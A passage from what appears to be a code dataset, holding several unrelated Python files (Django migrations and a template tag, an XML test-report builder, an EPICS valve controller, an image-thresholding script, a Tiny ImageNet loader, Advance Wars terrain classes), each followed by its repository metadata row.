indent_block = indent(child, level + 1, tab)
if indent_block or len(child) > 1:
# This child or some lower child block should be super-indented.
if len(elem) == 1:
# Pass indentation up because this level only has one child.
indent_parent = True
else:
# Surround this block with newlines for emphasis.
if prev is not None and _is_empty(prev.tail):
prev.tail = '\n' + j
if _is_empty(child.tail):
child.tail = '\n' + j
prev = child
if _is_empty(child.tail):
# Last child element determines closing tag tab level.
child.tail = i
else:
if level and _is_empty(elem.tail):
elem.tail = i
return indent_parent"""
def Tests(response, test_dic_for_case, name_testcase, top):
parent = SubElement(top, 'testsuite', name=str(name_testcase))
if "STATUS_CODE" in test_dic_for_case:
m = STATUS_CODE(response)
children = SubElement(parent, 'testcase', name=str(m))
if "False" in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "STATUS_CODE_NAME" in test_dic_for_case:
m = STATUS_CODE_NAME(response)
children = SubElement(parent, 'testcase', name=str(m))
if "False" in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "RESPONSE_TIME" in test_dic_for_case:
m = RESPONSE_TIME(response)
children = SubElement(parent, 'testcase', name=str(m))
if 'False' in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "CONTENT_TYPE_IS_PRESENT" in test_dic_for_case:
m = CONTENT_TYPE_IS_PRESENT(response)
children = SubElement(parent, 'testcase', name=str(m))
if 'False' in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "RESPONSE_HAS_ACCKEY" in test_dic_for_case:
dict_response = response.__dict__["_content"]
r = json.loads(dict_response)
m = RESPONSE_HAS_ACCKEY(r)
# print m
children = SubElement(parent, 'testcase', name=str(m))
if 'False' in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
| [
"evmon@ex.ua"
] | evmon@ex.ua |
392d504d2b4be2f95ee073ec8a8beccce1d6bd49 | d1a111119ec7aed797d1487b9a5740217d43effc | /students/templatetags/tags.py | 28e1e2ea85fd52a4ce90660cb5ee127a9c1a29cf | [] | no_license | shurique/student_task | 3f693f20691971f9e7fee03e8cc4cffd130aa53b | 2cf873adbc8657ac31e6efc4c12805c0387a67d7 | refs/heads/master | 2021-01-10T22:20:51.941404 | 2012-02-03T08:31:30 | 2012-02-03T08:31:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | #-*-coding: utf-8 -*-
from django import template
from django.core import urlresolvers
from django.contrib.contenttypes.models import ContentType
register = template.Library()
class EditListNode(template.Node):
def __init__(self, value):
self.var = template.Variable(value)
def render(self, context):
var = self.var.resolve(context)
ctype = ContentType.objects.get_for_model(type(var))
link = u'admin:%s_%s_change' % (ctype.app_label, ctype.model)
return urlresolvers.reverse(link, args=(var.id,))
@register.tag
def edit_list(parser, token):
try:
tag_name, value = token.split_contents()
except ValueError:
msg = u'Тег %r требует один аргумент' % token.split_contents()[0]
raise template.TemplateSyntaxError(msg)
return EditListNode(value)
| [
"godetskiy@ya.ru"
] | godetskiy@ya.ru |
b393a423256aa0f889b3a2d9a5f23682e1c3053d | 31136f3b2aa9ff7166f771a7f4e1da8dd1764b2e | /website/events/migrations/0005_auto_20190715_1440.py | ec4ca8cd745c5758545e2f31f6086ffdfe7a64c0 | [
"MIT"
] | permissive | PyAr/asoc_members | 202bb05f6c58644f5edb19c80a7276b493d3c76b | ed3944acadd7d08e53acd6edb5961a4248ea4782 | refs/heads/master | 2023-04-15T07:41:45.725797 | 2023-04-11T15:13:24 | 2023-04-11T15:13:24 | 131,543,379 | 10 | 26 | MIT | 2023-08-22T22:41:12 | 2018-04-30T01:10:30 | Python | UTF-8 | Python | false | false | 7,405 | py | # Generated by Django 2.0.4 on 2019-07-15 14:40
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import events.helpers.models
import events.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('events', '0004_auto_20190618_1853'),
]
operations = [
migrations.CreateModel(
name='Expense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('description', models.CharField(blank=True, default='', help_text='Descripción del gasto', max_length=317, verbose_name='descripción')),
('amount', models.DecimalField(decimal_places=2, max_digits=18, verbose_name='monto')),
('invoice_type', models.CharField(choices=[('A', 'Factura A'), ('B', 'Factura B'), ('C', 'Factura C'), ('Tic', 'Ticket'), ('Otr', 'Otro')], max_length=5, verbose_name='tipo factura')),
('invoice_date', models.DateField(verbose_name='fecha factura')),
('invoice', models.FileField(upload_to=events.models.expense_upload_path, verbose_name='factura')),
('category', models.CharField(choices=[('Prv', 'Gasto proveedor'), ('Ref', 'Reintegro organizador')], max_length=5, verbose_name='tipo gasto')),
],
options={
'permissions': (('view_expenses', 'puede ver gastos'),),
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('document', models.FileField(upload_to='media/events/payments/', verbose_name='comprobante')),
('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_changed_by', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_created_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='Provider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('document_number', models.CharField(help_text='CUIT del propietario de la cuenta, formato ##-########-#', max_length=13, unique=True, validators=[django.core.validators.RegexValidator('^(20|23|24|27|30|33|34)-[0-9]{8}-[0-9]$', 'El CUIT ingresado no es correcto.')], verbose_name='CUIT')),
('bank_entity', models.CharField(help_text='Nombre de la entiedad bancaria.', max_length=317, verbose_name='entidad bancaria')),
('account_number', models.CharField(help_text='Número de cuenta.', max_length=13, verbose_name='número de cuenta')),
('account_type', models.CharField(choices=[('CC', 'Cuenta corriente'), ('CA', 'Caja de ahorros')], max_length=3, verbose_name='Tipo cuenta')),
('organization_name', models.CharField(help_text='Razón social o nombre del propietario de la cuenta.', max_length=317, verbose_name='razón social')),
('cbu', models.CharField(help_text='CBU de la cuenta', max_length=317, verbose_name='CBU')),
('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_changed_by', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_created_by', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created'],
'permissions': (('view_providers', 'puede ver proveedores'),),
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='OrganizerRefund',
fields=[
('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
('organizer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='refunds', to='events.Organizer', verbose_name='Organizador')),
('payment', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
],
options={
'abstract': False,
},
bases=('events.expense',),
),
migrations.CreateModel(
name='ProviderExpense',
fields=[
('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
('payment', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Provider', verbose_name='Proveedor')),
],
options={
'abstract': False,
},
bases=('events.expense',),
),
migrations.AddField(
model_name='expense',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expense',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expense',
name='event',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Event', verbose_name='Evento'),
),
]
| [
"andres.ramirez.miori@gmail.com"
] | andres.ramirez.miori@gmail.com |
1ca54c25efd9250bdc727477130bd4e28d32ef07 | c6f063e2f6ab9aed7743255b8c4b131a3638dd30 | /env1/lib/python3.9/site-packages/webpush/migrations/0003_auto_20211108_1056.py | 22febc2a8208476cc38e6b2d934e7872117439d3 | [] | no_license | Muthoniyahya/agricoope | 31d94ee02e0e5cc650afc251104c6fe4a91cb1b9 | c1ef91866b4646a19825a6d833f78868663d61d1 | refs/heads/master | 2023-09-02T21:33:41.991628 | 2021-11-18T23:22:27 | 2021-11-18T23:22:27 | 429,600,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | # Generated by Django 3.2.8 on 2021-11-08 10:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webpush', '0002_auto_20190603_0005'),
]
operations = [
migrations.AlterField(
model_name='group',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='pushinformation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subscriptioninfo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| [
"Muthoniyahya@gmail.com"
] | Muthoniyahya@gmail.com |
6346038aeef107d5a4c7721f2a780ff4708abbcc | f5b2ee7b630385a8173326aede9b3c43794c4b3e | /server/world/item.py | 5720951d7a49726ebb51efe2d3f6063c6f5e02af | [] | no_license | dslice25/tinymmo-server | 3a324c38475b64220cf6a6bde6ee1277a9bf259b | 2d01212a8ce6ba9ecc87e2fcf2a3c4979255e926 | refs/heads/master | 2021-01-23T10:07:33.355822 | 2017-12-08T21:02:06 | 2017-12-08T21:02:06 | 102,606,582 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,571 | py | import ConfigParser
import uuid
class Item:
index = 0
config = ConfigParser.RawConfigParser()
config.read('server_data/items.ini')
def getid(self):
Item.index += 1
return Item.index
def __init__(self, name, player, container, equipped, world):
#self.name = "%s-%s" % (name, self.getid())
self.name = str(uuid.uuid4())
self.player = player
self.container = container
self.equipped = equipped
self.world = world
self.title = Item.config.get(name, 'title')
self.gear_type = Item.config.get(name, 'gear_type')
self.slot = Item.config.get(name, 'slot')
self.hit = Item.config.getint(name, 'hit')
self.dam = Item.config.getint(name, 'dam')
self.arm = Item.config.getint(name, 'arm')
self.spi = Item.config.getint(name, 'spi')
self.hp = Item.config.getint(name, 'hp')
self.mp = Item.config.getint(name, 'mp')
self.speed = Item.config.getfloat(name, 'speed')
self.icon = Item.config.get(name,'icon')
self.value = Item.config.getint(name, 'value')
self.consumeable = Item.config.getboolean(name, 'consumeable')
self.world.items[self.name] = self
def state(self):
return { 'title': self.title, 'name': self.name, 'slot': self.slot, 'equipped': self.equipped, 'gear_type': self.gear_type, 'icon': self.icon, 'hit': self.hit, 'dam': self.dam, 'arm': self.arm, 'spi': self.spi, 'speed': self.speed, 'value': self.value, 'hp': self.hp, 'mp': self.mp, 'consumeable': self.consumeable }
| [
"dablum@mit.edu"
] | dablum@mit.edu |
09c006664cf108d6ae9fc0f41fcb8e22fcea4877 | a9e60d0e5b3b5062a81da96be2d9c748a96ffca7 | /configurations/i21-config/scripts/functions/sample_vessel_vacuum_control.py | 055be6350f0c567e280cfe42194b79f557165ef8 | [] | no_license | openGDA/gda-diamond | 3736718596f47607335ada470d06148d7b57526e | bbb64dcfd581c30eddb210c647db5b5864b59166 | refs/heads/master | 2023-08-16T08:01:11.075927 | 2023-08-15T16:01:52 | 2023-08-15T16:01:52 | 121,757,699 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | '''
define function to control the sample vessel vacuum valves for sample changes
Created on 18 Jul 2023
@author: fy65
'''
import installation
from gda.device.scannable import ScannableMotionBase
from gda.epics import CAClient
# control PV = BL21I-EA-SMPL-01:SEQ:CTRL
# state PV = BL21I-EA-SMPL-01:SEQ:CTRL:STATE_RBV
class SampleVesselValvesControl(ScannableMotionBase):
def __init__(self, name, pv):
self.setName(name)
self.setInputNames([name])
self.setOutputFormat(["%d"])
self.control = CAClient(pv)
self.state = CAClient(pv + ":STATE_RBV")
self.control.configure()
self.state.configure()
self.val = 0
def getPosition(self):
if installation.isLive():
return int(self.control.get()) #0 - Close, 1 - Open
if installation.isDummy():
return self.val
def asynchronousMoveTo(self, val):
if installation.isLive():
self.control.caput(int(val))
if installation.isDummy():
self.val = val
if val == 1:
print("Open sample vessel valves")
if val == 0:
print("Close sample vessel valves")
def isBusy(self):
if installation.isLive():
return int(self.state.caget()) != 2 #2 - Ready, 1 - Opening, 0 - Closing
if installation.isDummy():
return False
sample_vessel_valves = SampleVesselValvesControl("sample_vessel_valves", "BL21I-EA-SMPL-01:SEQ:CTRL")
| [
"fajin.yuan@diamond.ac.uk"
] | fajin.yuan@diamond.ac.uk |
2908f0e3db2a300277114b39d46d25d3ea5e1012 | 2d3976964d8923a1e91e31af702bd68fbf37d474 | /runTask/server.py | 1bd36c0754e0d042ad090870e35b568521b7c88d | [] | no_license | barry800414/master_thesis | 2f6900fb2964891849dadef9283ed6e7f11cc696 | 01a0cac30ab63fcf818f1f43959634094b624af5 | refs/heads/master | 2020-05-29T08:53:32.810702 | 2016-06-04T02:03:52 | 2016-06-04T02:03:52 | 38,382,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | #!/usr/bin/env python3
from multiprocessing.managers import BaseManager
import queue
import sys
if __name__ == '__main__':
port = 3333
if len(sys.argv) == 2:
port = int(sys.argv[1])
q = queue.Queue()
# a QueueManager hold a queue q, which automatically handle race condition
class QueueManager(BaseManager):
pass
QueueManager.register('get_queue', callable = lambda: q)
m = QueueManager(address = ('0.0.0.0', port), authkey = b'barry800414')
s = m.get_server()
print('Server is running now (port:%d) ...' % (port), file=sys.stderr)
s.serve_forever()
| [
"barry800414@gmail.com"
] | barry800414@gmail.com |
25511219866cbb40fbd6b80bfdc1df6200549f29 | db46e847a9e382bcc7e062cfbac52fbac0cea490 | /Bolum1/otsu1.py | ef7e7265b90e4fec9241caa5466f6d9d53430f01 | [] | no_license | pnarbedir/ImageProcessing | 137ecb3a027afbb41573466415e570055ac00ad5 | 94f4778e773c1ffdda398e6da3824267b7c68651 | refs/heads/master | 2023-05-02T13:10:15.254882 | 2021-05-16T00:28:42 | 2021-05-16T00:28:42 | 363,901,232 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('original.jfif',0)
ret,th1 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)
ret,th2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
blur = cv2.GaussianBlur(img,(5,5),0)
ret,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
cv2.imshow('orj',img)
cv2.imshow('th1',th1)
cv2.imshow('th2',th2)
cv2.imshow('th3',th3)
cv2.waitKey()
| [
"pnarbedir98@gmail.com"
] | pnarbedir98@gmail.com |
92ec94b88e74f9385c3753e035a3676a25f2ecc7 | 6e5c2ba6cd380af56d7714cd6b3ec31b0e0d947e | /src/error_single.py | 082454e4f3df909b97bfed7a7eed20a83a2d8748 | [] | no_license | luedu/Bokeh-Effect | 74a0d2b2800a458da9983d377418542bf40d409c | f985dd366918f35de92ec118ca0b4783812ad4d6 | refs/heads/master | 2022-04-17T12:32:54.975888 | 2020-04-19T14:10:54 | 2020-04-19T14:10:54 | 257,001,932 | 0 | 0 | null | 2020-04-19T13:08:40 | 2020-04-19T13:08:40 | null | UTF-8 | Python | false | false | 1,794 | py | import torch
import cv2
import sys
from utils import dice_coeff,dice_loss,normalization,denormalize,ab_rel_diff,sq_rel_diff,rms_linear
import numpy as np
def set_requires_grad(nets, requires_grad=False):
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
modelName = sys.argv[1]
modelType = sys.argv[2]
imagePath = sys.argv[3]
depthMap = sys.argv[4]
image = cv2.resize(cv2.imread(imagePath),(256,256), interpolation=cv2.INTER_CUBIC)
depth = cv2.resize(cv2.imread(depthMap),(256,256), interpolation=cv2.INTER_CUBIC)
image = torch.from_numpy(np.array(image).reshape(1,3,256,256)).float()
depth = torch.from_numpy(np.array(depth).reshape(1,3,256,256)).float()
if modelType == 'c' :
model = torch.load("../CGmodel/"+modelName)
gen = model.G_XtoY
elif modelType == 'p' :
model = torch.load("../P2Pmodel/"+modelName)
gen = model.G
else:
print("Choose a model type from 'c/p'")
exit(1)
set_requires_grad(gen,False)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
image = normalization(image).to(device)
pred_depth = gen.to(device).forward(image)
depth = normalization(depth).to(device)
cv2.imwrite("testDepth.jpg", np.array(denormalize(depth).cpu().detach()).reshape(256,256,3))
pred_depth = denormalize(pred_depth,flag=1)
depth = denormalize(depth,flag=1)
# dice=dice_coeff(pred_depth,depth)
rel_dif = ab_rel_diff(pred_depth,depth)
sq_rel_dif = sq_rel_diff(pred_depth,depth)
rms = rms_linear(pred_depth,depth)
# print("Dice Coefficient is : ", dice)
print("Absolute Relative Difference is : ", rel_dif)
print("Square Relative Difference is : ", sq_rel_dif)
print("RMS Difference is : ", rms)
| [
"yashkhem1@gmail.com"
] | yashkhem1@gmail.com |
fe57a510beaf39e45c60b51b452a5c31026ab28d | 3ecce3646d66033d214db3749be63e78d4f663e9 | /Assignment 4/load_utils.py | 9b4f3fc6a5fb3ab71f6dc4b5ce5cbba2fb817a22 | [
"Apache-2.0"
] | permissive | pradyumnakr/EIP-3.0 | f36aaed042d65beef163b08dbb0de05139e3fee7 | 67bc5168b169406d7567f3d1d3b9b35fc7dd61af | refs/heads/master | 2022-01-27T15:23:00.013031 | 2019-07-28T17:25:35 | 2019-07-28T17:25:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,699 | py | def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
# First load wnids
with open(os.path.join(path, 'wnids.txt'), 'r') as f:
wnids = [x.strip() for x in f]
# Map wnids to integer labels
wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
# Use words.txt to get names for each class
with open(os.path.join(path, 'words.txt'), 'r') as f:
wnid_to_words = dict(line.split('\t') for line in f)
for wnid, words in wnid_to_words.items():
wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
class_names = [wnid_to_words[wnid] for wnid in wnids]
# Next load training data.
X_train = []
y_train = []
for i, wnid in enumerate(wnids):
if (i + 1) % 20 == 0:
print(f'loading training data for synset {(i + 1)}/{len(wnids)}')
# To figure out the filenames we need to open the boxes file
boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
with open(boxes_file, 'r') as f:
filenames = [x.split('\t')[0] for x in f]
num_images = len(filenames)
X_train_block = np.zeros((num_images, 64, 64, 3), dtype=dtype)
y_train_block = wnid_to_label[wnid] * np.ones(num_images, dtype=np.int64)
for j, img_file in enumerate(filenames):
img_file = os.path.join(path, 'train', wnid, 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
## grayscale file
img.shape = (64, 64, 1)
X_train_block[j] = img.transpose(1, 0, 2)
X_train.append(X_train_block)
y_train.append(y_train_block)
# We need to concatenate all training data
X_train = np.concatenate(X_train, axis=0)
y_train = np.concatenate(y_train, axis=0)
# Next load validation data
with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
img_files = []
val_wnids = []
for line in f:
img_file, wnid = line.split('\t')[:2]
img_files.append(img_file)
val_wnids.append(wnid)
num_val = len(img_files)
y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
X_val = np.zeros((num_val, 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'val', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_val[i] = img.transpose(1, 0, 2)
# Next load test images
# Students won't have test labels, so we need to iterate over files in the
# images directory.
img_files = os.listdir(os.path.join(path, 'test', 'images'))
X_test = np.zeros((len(img_files), 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'test', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_test[i] = img.transpose(1, 0, 2)
y_test = None
y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
if os.path.isfile(y_test_file):
with open(y_test_file, 'r') as f:
img_file_to_wnid = {}
for line in f:
line = line.split('\t')
img_file_to_wnid[line[0]] = line[1]
y_test = [wnid_to_label[img_file_to_wnid[img_file]] for img_file in img_files]
y_test = np.array(y_test)
mean_image = X_train.mean(axis=0)
if subtract_mean:
X_train -= mean_image[None]
X_val -= mean_image[None]
X_test -= mean_image[None]
return {
'class_names': class_names,
'X_train': X_train,
'y_train': y_train,
'X_val': X_val,
'y_val': y_val,
'X_test': X_test,
'y_test': y_test,
'class_names': class_names,
'mean_image': mean_image,
}
data = load_tiny_imagenet('/content/tiny-imagenet-200/', dtype=np.float32, subtract_mean=True)
| [
"vishal114186@gmail.com"
] | vishal114186@gmail.com |
9ba996ef80069b6979c8495ddbf3ffbab87f533c | d0af71157005190c6421b640b0e6cee2f237aace | /examples/bamboo/bamboo_plan_directory_info.py | 9706338f0eb798ba9532324312cadf808092d542 | [
"Apache-2.0"
] | permissive | atlassian-api/atlassian-python-api | d8adeb43ea4c92c10a03f1b53b53b87820f1841d | bb1c0f2d4187ba8efa1a838cd0041b54c944fee8 | refs/heads/master | 2023-08-29T06:57:22.136461 | 2023-08-27T18:53:00 | 2023-08-27T18:53:00 | 19,530,263 | 1,130 | 679 | Apache-2.0 | 2023-09-13T19:27:44 | 2014-05-07T10:26:26 | Python | UTF-8 | Python | false | false | 433 | py | # coding=utf-8
import os
from atlassian import Bamboo
BAMBOO_URL = os.environ.get("BAMBOO_URL", "http://localhost:8085")
ATLASSIAN_USER = os.environ.get("ATLASSIAN_USER", "admin")
ATLASSIAN_PASSWORD = os.environ.get("ATLASSIAN_PASSWORD", "admin")
bamboo = Bamboo(url=BAMBOO_URL, username=ATLASSIAN_USER, password=ATLASSIAN_PASSWORD)
plan_directories_roots = bamboo.plan_directory_info("PROJ-PLAN")
print(plan_directories_roots)
| [
"noreply@github.com"
] | atlassian-api.noreply@github.com |
9138de1148cd345ac2d731ad25502eed850fa264 | 2d83d627c446fa84e301f27196f893902066a8a3 | /smartcity/dbview/migrations/0008_auto_20171030_1950.py | 8a2f889d476a5e7077de8a008cc9e650156ad104 | [] | no_license | PoeticIron/ifb299-57lines | 1e71a79c97a05c0ff7e6c1651469dbd0904385a7 | 837d49437c674daafec805c8f4b1a6c7f595eedf | refs/heads/master | 2021-01-01T18:36:47.580779 | 2017-11-03T05:42:05 | 2017-11-03T05:42:05 | 98,384,561 | 0 | 2 | null | 2017-09-19T07:34:37 | 2017-07-26T05:51:16 | Python | UTF-8 | Python | false | false | 639 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-30 09:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dbview', '0007_auto_20171030_1947'),
]
operations = [
migrations.AlterField(
model_name='museums',
name='Lat',
field=models.CharField(default='-27.4772', max_length=30),
),
migrations.AlterField(
model_name='museums',
name='Lon',
field=models.CharField(default='153.0278', max_length=30),
),
]
| [
"nmestone@gmail.com"
] | nmestone@gmail.com |
5991aa7286b2e0849710359d66a0645c362da72d | 3b3be533e7fd90a84c54693975dd1809a8814e92 | /terrains.py | 4dffc6e4808ac39e3c204805f9124af000578d2e | [] | no_license | Fenrir127/advance_wars | ed9e91013fb7972d39557551b0a7964a255115a1 | 736eecde986111fa15f452f292201d2abb483a4e | refs/heads/main | 2023-03-27T13:21:32.349864 | 2021-03-26T03:14:57 | 2021-03-26T03:14:57 | 304,418,098 | 0 | 0 | null | 2021-02-20T00:02:20 | 2020-10-15T18:41:44 | Python | UTF-8 | Python | false | false | 9,912 | py | from os import path
from sprites import *
from setting import *
"""
This contains all the information for the different terrain in the game
Nothing should change in there unless there's a way to change terrain in the game which I don't think there is (except building hp)
"""
# This is the master class Terrain which only serves to pass on the function get_mvt_cost()
class Terrain:
def __init__(self, game):
self.game = game
self.terrain_type = None
self.infantry_mvt_cost = None
self.mech_mvt_cost = None
self.tires_mvt_cost = None
self.tread_mvt_cost = None
self.air_mvt_cost = None
self.ship_mvt_cost = None
self.transport_mvt_cost = None
# This function returns the mvt_cost for one of the 7 mvt_type on a given terrain
def get_mvt_cost(self, type):
if type == INFANTRY:
return self.infantry_mvt_cost
elif type == MECH:
return self.mech_mvt_cost
elif type == TIRES:
return self.tires_mvt_cost
elif type == TREAD:
return self.tread_mvt_cost
elif type == AIR:
return self.air_mvt_cost
elif type == SHIP:
return self.ship_mvt_cost
elif type == TRANSPORT:
return self.transport_mvt_cost
else:
print("get_mvt_cost was given the wrong input:")
print(type)
class Plain(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Plain_sprite(game, x, y)
self.name = "Plain"
self.defense = 1
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 2
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class River(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = River_sprite(game, x, y)
self.name = "River"
self.defense = 0
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 2
self.mech_mvt_cost = 1
self.tires_mvt_cost = 0
self.tread_mvt_cost = 0
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class Wood(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Wood_sprite(game, x, y)
self.name = "Wood"
self.defense = 2
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 3
self.tread_mvt_cost = 2
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class Mountain(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Mountain_sprite(game, x, y)
self.name = "Mountain"
self.defense = 4
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 2
self.mech_mvt_cost = 1
self.tires_mvt_cost = 0
self.tread_mvt_cost = 0
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class Sea(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Sea_sprite(game, x, y)
self.name = "Sea"
self.defense = 0
self.type = WATER
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 0
self.mech_mvt_cost = 0
self.tires_mvt_cost = 0
self.tread_mvt_cost = 0
self.air_mvt_cost = 1
self.ship_mvt_cost = 1
self.transport_mvt_cost = 1
class Beach(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Beach_sprite(game, x, y)
self.name = "Sea"
self.defense = 0
self.type = WATER
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 2
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 1
class Road(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Road_sprite(game, x, y)
self.name = "Road"
self.defense = 0
